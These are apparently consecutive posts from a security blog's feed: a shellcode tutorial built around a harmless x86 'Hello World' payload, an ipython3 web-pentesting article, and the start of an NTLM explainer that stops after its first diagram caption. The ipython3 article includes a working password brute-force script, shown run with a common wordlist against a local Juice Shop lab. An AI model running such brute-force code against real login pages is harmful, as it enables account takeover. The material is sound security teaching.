By the end of this chapter, you will gain not just the technical know-how but also the analytical skills essential for proficient shellcode development. Whether you&apos;re a budding security enthusiast or an experienced penetration tester, this guide aims to enhance your understanding and capabilities in the fascinating world of shellcode. Let&apos;s embark on this journey of discovery and skill-building in the art of shellcode development.

# **Understanding Shellcodes**

At its core, a shellcode is a sequence of bytes injected into a program&apos;s memory due to a vulnerability. Its primary goal? To execute operating system commands, potentially granting the attacker access to or elevated privileges on the target machine. Shellcodes open a doorway to numerous possibilities, from simple command execution to complete system takeover.

While there are various methods to program a shellcode, we&apos;ll focus on the classical approach: using assembler. Though initially challenging, this method provides a solid foundation for understanding the underlying mechanics of shellcodes. In upcoming chapters, we&apos;ll explore different techniques for creating shellcodes and integrating them into exploits.

# **Syscalls: Direct Communication with the Operating System:**

Typically, a C program utilizes functions like &apos;write&apos; or &apos;printf&apos; from the libc library, which facilitates OS-level operations such as writing, reading, and executing programs. However, shellcodes don&apos;t have this luxury since they&apos;re not loaded into memory by the OS but passed as vulnerable parameters to programs. Thus, managing system calls (syscalls) falls upon us.

In the context of x86 architecture, which we&apos;ll be focusing on, syscalls are made using the “int 0x80” instruction. While this may seem complex at first, practical examples in the following sections will clarify its usage and application.

# **Decoding Syscalls for Assembler Mastery**

As you embark on assembler programming, having a syscall cheat sheet is invaluable. One such resource is the comprehensive list of x86 syscalls, which can be found [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit). For our &quot;Hello World&quot; program, the &apos;write&apos; syscall is our focus.

![img](/content/images/2023/05/2023-05-17_08-27-58_screenshot.png)

Syscalls with corresponding arguments

Here&apos;s a quick breakdown of how syscalls work with registers in assembler:

-   `eax` -&gt; Syscall number (0x04 for &apos;write&apos;)
-   `ebx` -&gt; First argument (File descriptor)
-   `ecx` -&gt; Second argument (String to print)
-   `edx` -&gt; Third argument (Number of characters)

Understanding this structure is crucial, as each syscall requires specific register values. You can get more details on these arguments by running `man 2 write` in the terminal.

![](/content/images/2023/05/image-12.png)

If you do not want to use the webpage, you can always see the different existing calls in the following file: “/usr/include/asm/unistd\_32.h”.

```c
#ifndef _ASM_UNISTD_32_H
#define _ASM_UNISTD_32_H

#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4

```

# **Continuing Our Assembler Journey: Crafting &quot;Hello World&quot;**

Following our exploration of syscalls and their roles in assembler programming, let&apos;s apply these concepts by programming a classic &quot;Hello World&quot; message. This exercise is not merely an introduction to programming; it serves as a foundational step towards mastering assembler and understanding how syscalls interact with system architecture.

### **Laying the Foundation in the Data Segment**

n the `.data` segment of our assembly code, we define a string named &quot;message.&quot; This string is terminated with a zero character, denoting the end of the message, and it&apos;s here that we begin to put our syscall knowledge into practice.

```nasm
section .data                  ; DATA segment
message db &quot;Hello world&quot;, 0x0a

```

By initializing our &quot;Hello world&quot; message and appending a newline character (`0x0a`), we set up the text to be displayed correctly.

### **Setting Up the Execution in the Text Segment:**

Transitioning to the `.text` segment, we establish `_start` as our program&apos;s entry point. Here, the execution of our syscall sequence begins.

```nasm
section .text                  ; TEXT segment
  global _start                ; ELF entry point
  _start:
    ; syscall write(1, message, 11)
    mov eax, 4                 ; 4 = write, syscall number
    mov ebx, 1                 ; 1 = stdout, file descriptor
    mov ecx, message           ; message in ecx
    mov edx, 11                ; message length (Hello world\n)
    int 0x80                   ; system call interrupt

```

This setup involves configuring the necessary registers for the `write` syscall, preparing our program to display the message.

### **Assembling and Linking the Code**

To transform our code into an executable format, we use the `nasm` assembler and `ld` linker:

```bash
nasm -f elf HellowWorld.asm
ld -m elf_i386 -o helloworld HellowWorld.o
./helloworld

```

![img](/content/images/2023/05/2023-05-18_08-46-16_screenshot.png)

Sample exception after running the executable

### **Properly Exiting with the Exit Syscall:**

To ensure a clean exit from our program, we implement the `exit` syscall, zeroing out the registers to set the stage for a graceful termination:

```nasm
xor    ebx,ebx              ; ebx = 0, status code
xor    eax,eax
mov    al,0x1               ; 1 = exit, syscall
int    0x80

```

Applying this `xor` technique to zero the registers is a common practice in shellcode creation, making it an essential skill in low-level programming.

![](/content/images/2023/05/image-10.png)

Sample assembler code

If we run the program, it should no longer show any segmentation fault errors.

&lt;details&gt;
&lt;summary&gt;Program code&lt;/summary&gt;

```nasm
section .data                  ; segmento DATA
  message db &quot;Hello world&quot;, 0x0a

section .text                  ; segmento TEXT
  global _start                ; punto de entrada del ELF

  _start:

  ; syscall write(1, mensaje, 11)
    mov eax, 4                 ; 4 = write, nro syscall
    mov ebx, 1                 ; 1 = stdout, filedescriptor
    mov ecx, message           ; mensaje en ecx
    mov edx, 11                ; longitud del mensaje (Hola mundo\n)
    int 0x80                   ; interrupcion de llamado al sistema

    xor    ebx,ebx              ; ebx = 0, status code
    xor    eax,eax
    mov    al,0x1               ; 1 = exit, nro syscall
    int    0x80

```
&lt;/details&gt;


# **Transforming Assembler Code into Shellcode: A Practical Guide**

Transitioning from a basic assembler program to creating shellcode involves several critical modifications. Let&apos;s adapt our &quot;Hello World&quot; assembler code into a functional shellcode, focusing on the constraints and techniques unique to shellcode programming.

## **Navigating the Absence of the `.data` Section:**

In shellcode, the luxury of a `.data` section for defining variables is not available. This limitation requires us to find alternative methods to store and reference our desired string. A practical solution is to utilize the stack.

1.  **Storing Strings on the Stack:**
    -   We store the characters of our string in hexadecimal format directly onto the stack.
    -   It&apos;s crucial to use the little endian format to ensure the string is read correctly and not in reverse order.
2.  **Handling Odd-Length Strings:**
    -   In cases where the string length is odd, an extra byte is needed to align the stack.
    -   We use a &quot;NOP&quot; instruction (`0x90`) for this purpose, which effectively does nothing but helps in maintaining proper alignment.
3.  **Setting up the Stack Pointer:**
    -   The stack pointer (`esp`) is utilized to reference the top of the stack, where our string begins.

### **Graphical Overview of the Technique**

The diagram illustrates how we organize our string in the stack, emphasizing the little endian format.

![](/content/images/2023/05/image-14.png)

Diagram of stack usage for storing characters

## **Implementing the Write Syscall in Shellcode**

To execute the `write` syscall within our shellcode, we employ the following steps:

1.  **Preparing the Syscall:**
    -   Push the syscall number (`4` for `write`) and the file descriptor (`1` for stdout) onto the stack.
    -   Pop these values into the `eax` and `ebx` registers respectively, setting them up for the syscall.
2.  **Setting Up the Message and Length:**
    -   Move the stack pointer (`esp`) into `ecx`, pointing it to our message.
    -   Push and pop the message length into `edx`.
3.  **Executing the Syscall:**
    -   Trigger the syscall with `int 0x80`.

Here&apos;s the complete shellcode for the &quot;Hello World&quot; program, incorporating the discussed techniques:

```nasm
/* Hello World */
push 0x90646c72
push 0x6f77206f
push 0x6c6c6568
/* Write syscall */
push 4
pop eax
push 1
pop ebx
mov ecx, esp
push 0xb
pop edx
int 0x80

```

## **Crafting Shellcode: Avoiding Null Characters**

In shellcoding, a crucial consideration is the avoidance of null characters (`\0x00`). These characters can prematurely terminate the shellcode, particularly when passed as strings to functions like `scanf`, where `\0` signifies the end of the string. Let&apos;s explore how to craft shellcode while circumventing this pitfall.

### **The Challenge with Direct Register Loading:**

One might wonder why not directly load values into registers using instructions like `mov`. The issue here is that such instructions can generate machine code containing null characters. These nulls arise because if the data being moved is smaller than the register size, the remaining space is filled with zeros.

### **Demonstrating the Difference with Pwntools:**

Using the `asm` function from the `pwntools` library, we can compare the outputs of two shellcodes: one using `mov` and the other using stack operations.

```python
#!/usr/bin/env python3
shellcode = &quot;&quot;&quot;
    push 0x90646c72
    push 0x6f77206f
    push 0x6c6c6568
    mov eax, 0x4
    mov ebx, 1
    mov ecx, esp
    mov edx, 0xb
    int 0x80
&quot;&quot;&quot;
shellcode_stack = &quot;&quot;&quot;
    push 0x90646c72
    push 0x6f77206f
    push 0x6c6c6568
    push 4
    pop eax
    push 1
    pop ebx
    mov ecx, esp
    push 0xb
    pop edx
    int 0x80
&quot;&quot;&quot;

print(asm(shellcode))
print(asm(shellcode_stack))

```

![](/content/images/2023/05/2023-05-23_08-17-34_screenshot.png)

Machine code of the shellcode

The first string shows the output from the shellcode using `mov`, revealing several null characters. The second string, which uses stack operations, is free from such nulls.

### **Addressing the Null Character Issue**

To avoid null characters, we can focus on moving the value to a specific part of the register. However, this approach can lead to unknown values in the rest of the register. A common solution is to use the `xor` instruction to zero out the entire register first

```bash
xor eax, eax ; Zero out eax

```

This instruction doesn&apos;t contain `\0x00` and can be safely used.

## **Streamlining Shellcode: Emphasizing Compactness**

Following our focus on null character avoidance in shellcode, the next critical aspect to consider is minimizing the shellcode&apos;s size. Ensuring our shellcode is compact enough to fit within the program&apos;s buffer is essential. Oversizing could trigger a &quot;Segmentation Fault,&quot; halting the execution. This section delves into optimizing shellcode size, ensuring it snugly fits within the allocated space without compromising functionality.

### **Balancing Efficiency with Size**

When it comes to shellcode, every byte counts. Let&apos;s take the example of setting the value `1` in the `eax` register:

1.  **Direct Assignment Approach:**
    -   A straightforward method like `mov eax, 1` is simple but may not be the most size-efficient.
2.  **Incremental Instruction Alternative:**
    -   Using `inc eax` is a more subtle approach. It increments `eax` by `1` and typically results in smaller machine code.

![](/content/images/2023/05/2023-05-24_08-31-01_screenshot-1.png)

Alternatives for entering 0x1 in eax

  
In the comparison, `inc eax` is likely to result in a smaller machine code footprint than `mov eax, 1`. This difference can be crucial when working with limited buffer sizes.

### **Strategies for Reducing Shellcode Size:**

To achieve the desired compactness in shellcode, consider the following strategies:

-   **Opt for Shorter Instructions:** Seek out instructions that accomplish the same task but with a reduced footprint.
-   **Utilize Register Defaults:** Make the most of the existing states of registers to minimize the need for explicit value assignments.
-   **Efficient Data Handling:** Arrange data in a manner that reduces the need for extensive immediate values.

# **Navigating Shellcode Development: Troubleshooting with Tools**

As we continue our journey in shellcode programming, it&apos;s essential to acknowledge that encountering errors is part of the process. Understanding and resolving these errors is key to successful shellcode development. To aid in this, there are invaluable tools that provide insight into what&apos;s happening under the hood of your code.

## **Leveraging radare2 for Dynamic Analysis:**

One such tool is `radare2`, which we&apos;ve previously explored for dynamic code analysis. It&apos;s particularly useful in shellcode development for inspecting real-time execution and monitoring register values. This feature is vital in understanding how your shellcode behaves at each step and identifying where things might be going awry.

Consider the example of our &quot;Hello World&quot; shellcode. Using `radare2`, we can step through each instruction and observe the changes in register values, ensuring that our code executes as intended.

The image above demonstrates `radare2` displaying the execution of the initial instructions of the &quot;Hello World&quot; shellcode, with visible updates in register values.

![](/content/images/2023/05/image-15.png)

Dynamic analysis of our code with radare2

**Utilizing strace for System Call Inspection:**

Another powerful tool in our arsenal is `strace`. This utility allows us to monitor the system calls made by our shellcode. By using `strace`, we can verify whether these calls are executed correctly, a crucial step in debugging shellcode.

In the following image, we see `strace` in action, detailing the system calls made by the shellcode:

![](/content/images/2023/05/image-17.png)

Study of syscalls with strace

Armed with `radare2` and `strace`, most errors encountered during shellcode development can be effectively diagnosed and resolved. In the next chapter of this series, we&apos;ll delve into another tool that aids in examining shellcode during runtime. As we progress, it&apos;s clear that a combination of carefully crafted code and adept use of these analytical tools is essential in mastering the art of shellcode development.

# **Conclusion: Mastering Shellcode Development – Tools and Techniques**

As we conclude this chapter on shellcode development, it&apos;s evident that crafting effective shellcode is a blend of meticulous programming and strategic troubleshooting. The journey through assembler programming, optimizing for size, avoiding null characters, and ensuring seamless execution underscores the nuanced nature of shellcode development.

Key takeaways from this exploration include:

1.  **Understanding Syscalls and Assembler:** Delving into syscalls and their implementation in assembler lays the foundation for shellcode programming. Crafting a simple &quot;Hello World&quot; program is an essential step in grasping these core concepts.
2.  **Optimizing for Compactness:** Size optimization is crucial in shellcode design. Techniques like choosing shorter instructions and efficient register usage are vital to ensure the shellcode fits within the target program’s buffer.
3.  **Navigating Null Character Pitfalls:** Avoiding null characters in shellcode is imperative to prevent premature termination. Techniques such as stack manipulation and careful register handling are key to circumventing this issue.
4.  **Leveraging Diagnostic Tools:** Tools like `radare2` and `strace` are invaluable for debugging and understanding shellcode behavior. They offer insights into execution flow and system call processes, aiding in the identification and resolution of errors.

As we advance in shellcode development, it becomes clear that the process is as much about problem-solving and analysis as it is about coding. The integration of these skills not only enhances the efficacy of the shellcode but also elevates the expertise of the developer. Looking ahead, we will explore additional tools and methods to further refine our shellcode, continuing our journey in the dynamic and challenging world of exploitation and security research.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;Could you tell me in brief what is a shellcode ? What is its main use?&lt;/summary&gt;

A shellcode is nothing more than a string of bytes that will be attempted to be injected into the memory of a program as a result of the existence of a vulnerability. The usual purpose of a shellcode is to execute commands of the underlying operating system. If successful, it can cause the attacker to gain access to the machine on which the vulnerable program is running or escalate privileges on it, among many other options.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do we have to keep in mind about system calls and shellcodes ?&lt;/summary&gt;

We have to think that the system calls will have to be made and programmed by us using assembler and not by the operating system to perform tasks such as writing, reading or deleting files.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main feature that we will have to take into account when making use of system calls?&lt;/summary&gt;

That each system call is identified by an integer and must be entered in the &quot;eax&quot; register in order to use it.

![](/content/images/2023/09/image-29.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What three characteristics do we have to take into account when programming a shellcode?&lt;/summary&gt;

-   **A shellcode does not have a .data section**, so we will have to avoid defining variables. As a consequence, we can use the stack to enter values in registers and execute system calls.
-   We will have to not enter **&quot;Null characters&quot;** to prevent our shellcode from not being executedWe will have to not enter &quot;Null characters&quot; to prevent our shellcode from not being executed
-   It has to be adapted to the space available.
&lt;/details&gt;

# References

[Shellcode &amp; syscalls · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/buffer-overflow/2-shellcode.html)

[GitHub - Gallopsled/pwntools: CTF framework and exploit development library](https://github.com/Gallopsled/pwntools)</content:encoded><author>Ruben Santos</author></item><item><title>Python for Web Hacking: Harnessing ipython3 and Building Custom Functionalities</title><link>https://www.kayssel.com/post/ipython3-for-web-pentesting</link><guid isPermaLink="true">https://www.kayssel.com/post/ipython3-for-web-pentesting</guid><description>Discover Python&apos;s power in hacking web apps: Learn ipython3 use, scripting for authorization tests and brute force attacks, and effective error troubleshooting with practical, hands-on examples</description><pubDate>Fri, 05 May 2023 17:12:23 GMT</pubDate><content:encoded># **Introduction: Python and Ipython3 - The Dynamic Duo in Web Hacking**

Welcome to the intriguing world of web application hacking, where Python and Ipython3 emerge as formidable allies. In this comprehensive guide, we delve into how these powerful tools can revolutionize your approach to hacking web applications. Whether you&apos;re a seasoned hacker or just starting, this article will equip you with the knowledge and skills to effectively utilize Python and Ipython3 in your cybersecurity endeavors.

Python, known for its simplicity and versatility, isn&apos;t just a tool for software development; it&apos;s also a hacker&apos;s secret weapon. Coupled with Ipython3, an interactive Python shell, it transforms into a robust platform for testing, analyzing, and exploiting web vulnerabilities.

In this journey, we&apos;ll explore:

1.  **Why Ipython3?** Understand the unique advantages of using Ipython3 in web hacking, from its interactive environment to its capability for real-time feedback and error handling.
2.  **Practical Applications:** We&apos;ll dive into practical use cases, demonstrating how Python and Ipython3 can be applied to real-world hacking scenarios. From testing authorization mechanisms to performing brute force attacks, these examples will showcase the practicality and effectiveness of these tools.
3.  **Enhancing Efficiency:** Learn how to harness Ipython3&apos;s features, like creating customized profiles and executing shell commands within Python scripts, to enhance your hacking efficiency and productivity.

Prepare to embark on a journey that will not only boost your web hacking skills but also broaden your understanding of how Python can be an invaluable asset in the cybersecurity toolkit.

# **Ipython3: A Hacker&apos;s Toolkit in Python**

Why opt for ipython3 in your web hacking toolkit? As highlighted in our introduction, ipython3 isn&apos;t just another interactive shell; it&apos;s a Python powerhouse tailored for streamlined and effective programming. Let&apos;s delve into why it stands out as a go-to resource for hackers and programmers alike.

1.  **Real-Time Error Insights:** One of ipython3&apos;s standout features is its ability to flag errors as you code. This real-time feedback transforms scripting from a trial-and-error exercise into an efficient, streamlined process.
2.  **Intuitive Auto-Completion:** Coding becomes smoother with ipython3&apos;s auto-completion capabilities. Imagine typing a few letters and having the shell suggest variables and functions. It&apos;s like having a knowledgeable companion guiding your coding journey.
3.  **Shell Command Execution:** Ipython3 blurs the lines between Python scripting and shell command execution. This flexibility allows you to seamlessly integrate Python&apos;s power with the versatility of shell commands, all within a single environment.
4.  **Pre-Session Code Execution:** Picture this - you start your ipython3 session, and your frequently used functions are already loaded and ready to go. This feature is a time-saver, keeping your favorite tools at your fingertips from the get-go.

In the hands of a web hacker, ipython3 is more than a tool; it&apos;s an extension of your skillset, making your explorations into web vulnerabilities more effective and insightful. Ready to see it in action? Let&apos;s dive deeper and discover the practical applications of ipython3 in web hacking scenarios.

## **Main Utilities of Ipython3: Tailoring Your Web Hacking Environment**

### **Profiles: Customizing Ipython3 for Web Hacking**

Ipython3 stands out not just as an interactive shell but as a flexible tool that can be finely tuned for specific tasks, like web hacking. One of its most powerful features is the ability to create profiles - customized environments tailored for specific tasks.

**Creating a Web Hacking Profile**

Let&apos;s start by setting up a profile specifically designed for web hacking. This is done with a simple command:

```bash
[rsgbengi@kaysel]$ ipython profile create web_hacking
[ProfileCreate] Generating default config file: PosixPath(&apos;/home/rsgbengi/.ipython/profile_web_hacking/ipython_config.py&apos;)
[ProfileCreate] Generating default config file: PosixPath(&apos;/home/rsgbengi/.ipython/profile_web_hacking/ipython_kernel_config.py&apos;)

```

This command creates a new profile, complete with its configuration files. The real magic happens in the &quot;startup&quot; subdirectory of this profile, where you can store scripts to run automatically at the session&apos;s start. It&apos;s like having your toolkit ready the moment you step into your workspace.

**Organizing Scripts for Efficiency**

In this &quot;startup&quot; directory, you can organize your scripts in a specific order, ensuring that your environment is set up just the way you need it. For instance, you might start with scripts that format output for better visibility:

```python
In [5]: from rich.console import Console

In [6]: from rich.syntax import Syntax

In [7]: def html(response: str) -&gt; None:
   ...:     syntax = Syntax(response, &quot;html&quot;)
   ...:     console = Console()
   ...:     console.print(syntax)
   ...:

```

Using the `rich` module, this script takes the HTML response of a request and formats it for a clearer, more visual display, dramatically enhancing your hacking session&apos;s efficiency.

![](/content/images/2023/05/image.png)

Sample request response without using rich module

![](/content/images/2023/05/image-1.png)

Sample execution of the html function

**Exploring Functionality with &apos;?&apos;:**

Ipython3 also offers the ability to explore the functionality of any function or class with the simple use of a &apos;?&apos;. It&apos;s like having a quick reference guide at your fingertips:

```python
In [7]: from rich.syntax import Syntax
In [8]: Syntax?
Init signature:
Syntax(
    code: str,
    lexer: Union[pygments.lexer.Lexer, str],
    *,
    theme: Union[str, rich.syntax.SyntaxTheme] = &apos;monokai&apos;,
    dedent: bool = False,
    line_numbers: bool = False,
    start_line: int = 1,
    line_range: Optional[Tuple[Optional[int], Optional[int]]] = None,
    highlight_lines: Optional[Set[int]] = None,
    code_width: Optional[int] = None,
    tab_size: int = 4,
    word_wrap: bool = False,
    background_color: Optional[str] = None,
    indent_guides: bool = False,
    padding: Union[int, Tuple[int], Tuple[int, int], Tuple[int, int, int, int]] = 0,
) -&gt; None
Docstring:
Construct a Syntax object to render syntax highlighted code.

&lt;details&gt;
&lt;summary&gt;Args:&lt;/summary&gt;

```

This feature is invaluable for quickly understanding the capabilities and usage of different modules and functions.

**Saving and Reusing Code with %edit:**

When you find yourself frequently using a function, ipython3&apos;s `%edit` command is a lifesaver. It allows you to open your configured text editor, save your function, and ensure it&apos;s ready to use in your &quot;startup&quot; script:

```python
&lt;/details&gt;

In [1]: def html(response: str) -&gt; None:
   ...:     syntax = Syntax(response, &quot;html&quot;)
   ...:     console = Console()
   ...:     console.print(syntax)
   ...:

In [2]: %edit html

# Content of 00-rich.py
from rich.console import Console
from rich.syntax import Syntax

def html(response: str) -&gt; None:
    &quot;&quot;&quot;Function to display the response to a request in a more visual way.&quot;&quot;&quot;
    syntax = Syntax(response, &quot;html&quot;)
    console = Console()
    console.print(syntax)

def start_web_hacking_session() -&gt; None:
    console = Console()
    console.print(&quot;----------[red] Web Hacking [/red]----------&quot;)

start_web_hacking_session()

```

By saving this to a script like `00-rich.py`, you make sure that every time you start this profile, your favorite tools are just a command away.

  
**Launching the Web Hacking Profile:**

Now, whenever you launch ipython3 with this profile:

```python
[rsgbengi@kaysel]$ ipython3 --profile=web_hacking

Python 3.11.2 (main, Feb  8 2023, 00:00:00) [GCC 12.2.1 20221121 (Red Hat 12.2.1-4)]
Type &apos;copyright&apos;, &apos;credits&apos; or &apos;license&apos; for more information
IPython 8.5.0 -- An enhanced Interactive Python. Type &apos;?&apos; for help.

IPython profile: web_hacking
---------- Web Hacking ----------

In [1]: html?
Signature: html(response: str) -&gt; None
Docstring: Function to display the response to a request in a more visual way.
File:      ~/.ipython/profile_web_hacking/startup/00-rich.py
&lt;details&gt;
&lt;summary&gt;Type:      function&lt;/summary&gt;

```

You&apos;re immediately greeted with your custom web hacking environment, complete with all the tools and scripts you&apos;ve set up, streamlining your hacking process and making every session more productive.

### **Executing Shell Commands in Ipython3: Enhancing Your Workflow**

In the versatile world of ipython3, you&apos;re not confined to Python scripting alone. One of the standout features is the ability to execute shell commands within the ipython3 environment. This functionality is incredibly handy for file and directory management, eliminating the need to switch back and forth between Python and bash.

**Seamless Integration with Shell**

To demonstrate this seamless integration, let&apos;s dive into a practical example. Imagine you&apos;re working within a directory and want to quickly list and interact with its contents. In ipython3, this is as simple as prefixing your shell command with a &quot;!&quot; symbol:

```python
&lt;/details&gt;

[rsgbengi@kaysel]$ ipython3

In [1]: files = !ls

```

Here, the `!ls` command behaves just like it would in a standard shell, listing the contents of the current directory. The output of this command is then stored in the Python variable `files`.

**Interacting with Command Output**

With the output stored in a Python variable, you have the full power of Python at your disposal to process and interact with these data:

```python
In [2]: for file in files:
   ...:     print(file)
   ...:
1.txt
2.txt
3.txt


```

In this example, we iterate over the list of files, printing out each file name. This level of integration showcases how ipython3 bridges the gap between Python scripting and shell command execution, making your web hacking sessions more fluid and efficient.

**Leveraging Ipython3 for Web Hacking**

In the context of web hacking, this capability opens up a world of possibilities. Whether you&apos;re managing files, interacting with databases, or handling network operations, ipython3&apos;s ability to execute shell commands means you can perform a wide range of tasks without ever leaving your Python environment.

# **Practical Use Cases: Applying Python in Pentesting**

## **Testing Authorization with Ipython3**

Imagine you&apos;ve gathered a list of URLs from an authenticated user and want to check if these are accessible to an unauthenticated user. Manually testing each URL can be tedious, but with Ipython3, we can automate this process efficiently. Let&apos;s see how:

### Gathering URLs

Load all the URLs into a list. In this example, we&apos;re using a list from the &apos;juice-shop&apos;, a commonly used vulnerable application for demonstration purposes.

```python
In [1]: urls = !cat storeurls.txt
In [2]: urls
Out[3]:
[&apos;http://localhost:3000/&apos;,
 &apos;http://localhost:3000/&apos;,
 &apos;http://localhost:3000/api&apos;,
 &apos;http://localhost:3000/api/Challenges&apos;,
 &apos;http://localhost:3000/api/Challenges/&apos;,
 &apos;http://localhost:3000/api/Challenges/?name=Score%20Board&apos;,
 &apos;http://localhost:3000/api/Quantitys&apos;,
 &apos;http://localhost:3000/api/Quantitys/&apos;,
 &apos;http://localhost:3000/assets&apos;,
 &apos;http://localhost:3000/assets/i18n&apos;,
 &apos;http://localhost:3000/assets/i18n/en.json&apos;,
 ...

```

This function iterates through the URLs, makes GET requests, and stores the status codes in a dictionary for later use.

### **Establishing a Verification Method**

The next step involves checking the accessibility of each URL. We&apos;ll use the response status code as an indicator: a status code of 200 implies access.

```python
import requests
from requests.sessions import Session
import validators

def check_authorization_witout_cookies(urls: list[str]) -&gt; dict[str, str]:
    responses = {}
    with requests.Session() as session:
        for url in urls:
            if url != &quot;&quot; and validators.url(url):
                print(&quot;[+]&quot;+ url)
                response = session.get(url)
                responses[url] = response.status_code
            else:
                print(&quot;[-] Invalid URL&quot;)
    return responses

```

This function iterates through the URLs, makes GET requests, and stores the status codes in a dictionary for later use.

### **Displaying Results Visually**

To make the results more user-friendly, we utilize the `rich` module to create a table displaying each URL&apos;s status code.

```python
from rich.console import Console
from rich.syntax import Syntax
from rich.table import Table

def create_status_table(requests_info: dict[str, str]) -&gt; None:
    console = Console()
    table = Table(show_header=True, header_style=&quot;bold magenta&quot;)
    table.add_column(&quot;Url&quot;)
    table.add_column(&quot;Status Code&quot;)
    for key, value in requests_info.items():
        table.add_row(key, str(value))
    console.print(table)

```

![](/content/images/2023/05/image-2.png)

Sample of information obtained through the function &quot;create\_status\_table&quot;.

## **Brute Force Login Attack**

Another practical use case is performing brute force attacks to crack a user&apos;s password.

### **Defining the Brute Force Function:**

This function attempts to log in with different passwords until the correct one is found.

```python
def login_user_bruteforzing(url: str, username: str, passwords: list[str]) -&gt; dict[str,str]:
    results = {}
    console = Console()
    with console.status(f&quot;[bold green] Bruteforzing the user {username}&quot;) as status:
        for password in passwords:
            with requests.Session() as session:
                console.log(f&quot;Password: {password}&quot;)
                data = {&quot;email&quot;: username, &quot;password&quot;: password}
                response = session.post(url, data=data)
                results[password] = response.status_code

    return results

```

It should be noted that on many occasions in POST type requests we will not know in what format and in what way the data is sent. For this we can make use of Burp Suite as seen in the following figure:

![](/content/images/2023/05/image-3.png)

Captured request to study parameters sent

### **Executing the Attack**

Load the list of potential passwords, set the username and target URL, and run the function.

```python
In [1]: words = !cat /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt

In [2]: username = &quot;test@gmail.com&quot;

In [3]: url = &quot;http://localhost:3000/rest/user/login&quot;

In [4]: results = login_user_bruteforzing(url, username, words)

```

### **Visualizing Results**

Use the `rich` module to display results in a table format, making it easier to spot the successful password attempt by the change in status code.

![](/content/images/2023/05/image-4.png)

Sample results of brute force attack on login panel

# **Conclusion: Harnessing Python and Ipython3 in Web Hacking**

As we conclude our exploration of using Python and Ipython3 in web application hacking, it&apos;s clear that these tools offer immense potential in the realm of cybersecurity. Throughout this article, we&apos;ve uncovered the power of Python not just as a programming language, but as a pivotal tool in the hands of web hackers and penetration testers.

**Key Takeaways:**

1.  **Versatility of Ipython3:** We&apos;ve seen how Ipython3 transcends being a mere interactive shell, evolving into a versatile platform for executing shell commands, automating tasks, and enhancing the efficiency of hacking exercises.
2.  **Streamlining Pentesting Processes:** The ability to create profiles, execute shell commands, and visually display data in Ipython3 significantly streamlines the penetration testing process. This efficiency is vital in a field where speed and accuracy are paramount.
3.  **Real-World Application:** The practical use cases, from testing authorization vulnerabilities to conducting brute force login attacks, demonstrate Python&apos;s and Ipython3&apos;s real-world applicability. These examples illustrate not just theoretical knowledge, but practical skills that can be directly applied in pentesting scenarios.
4.  **Continual Learning and Adaptation:** The journey through Python and Ipython3 in web hacking is a testament to the importance of continual learning and adaptation in cybersecurity. As threats evolve, so must our tools and techniques.

This article serves as a bridge between understanding Python&apos;s fundamental concepts and applying them in the specialized context of web application security. Whether you&apos;re a seasoned hacker or a novice in the field, the insights gained here are invaluable in navigating the ever-changing landscape of cybersecurity.

# Tips of the articles


&lt;details&gt;
&lt;summary&gt;What is the main use of the profiles?&lt;/summary&gt;

A profile is mainly used to group a set of code that is commonly used. In this way, in conjunction with sessions, we can adapt ipython3 to a particular task we are performing.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main use of the requests library and the rich library?&lt;/summary&gt;

The request&apos;s library is used to make and receive HTTP requests in a simple and fast way. On the other hand, the rich library is used to format the output we generate with our scripts so that all the results obtained can be seen in a more visual way.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can I use BurpSuite for when scripting ?&lt;/summary&gt;

I can study the format of the requests made from the client to the server so that, for example, I can know what parameters are sent in POST requests.
&lt;/details&gt;

# References

[25 IPython Tips for Your Next Advent of Code](https://switowski.com/blog/25-ipython-tips-for-your-next-advent-of-code/)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering NTLM: Exploring Authentication, Vulnerabilities, and Exploits</title><link>https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics</link><guid isPermaLink="true">https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics</guid><description>In this guide on NTLM, Microsoft&apos;s authentication protocol, we explore its three-step process and delve into various attacks like &apos;Pass the Hash&apos; and NTLM Relay. Techniques like reconnaissance, credential validation, and hash retrieval are examined, highlighting NTLM&apos;s role in network security.</description><pubDate>Fri, 21 Apr 2023 16:43:34 GMT</pubDate><content:encoded># **Introduction: Deciphering NTLM - Microsoft&apos;s Authentication Protocol**

  
Welcome to the fascinating world of NTLM, Microsoft&apos;s own brainchild for authentication, stepping up from the older, less secure LM protocol. Picture NTLM as a digital handshake, ensuring two Windows computers communicate securely.

Here&apos;s the clever part: NTLM uses a challenge-response technique, a kind of secret whisper, so users are verified without sending their passwords in plain sight. Instead, it cleverly transmits a hash, known as the Net-NTLMv1 or Net-NTLMv2 hash, depending on the NTLM version in play.

These hashes aren&apos;t just random numbers; they&apos;re crafted from the user&apos;s NT hash, a digital fingerprint found in the SAM or NTDS. Take the Net-NTLMv2 hash, for example, it&apos;s essentially a HMAC\_MD5, a digital signature, concocted from this NT hash.

![](/content/images/2023/04/image-9.png)

NT hash and Nt-NTLMv2 example

NTLM is a bit of a backstage artist, not creating traffic by itself but subtly weaving into other protocols like SMB, LDAP, or HTTP, adding a layer of authentication without making a scene.

In the world of active directory, Kerberos usually steals the limelight as the go-to authentication protocol. But NTLM isn&apos;t out of the game – it sneaks in when you connect to a network machine using an IP address instead of a hostname. This is because Kerberos needs hostnames to work its magic. So, when you&apos;re accessing a shared folder with \\ip&lt;shared\_folder&gt;, that&apos;s NTLM&apos;s moment to shine, while \\hostname&lt;shared\_folder&gt; is a Kerberos show.

So, let&apos;s dive deeper into NTLM, a protocol that might not always be in the spotlight, but plays a crucial role behind the scenes in network security and user authentication.

# **Bridging to NTLM Authentication Process**

![](/content/images/2023/04/image-2.png)

NTLM Authentication process diagram

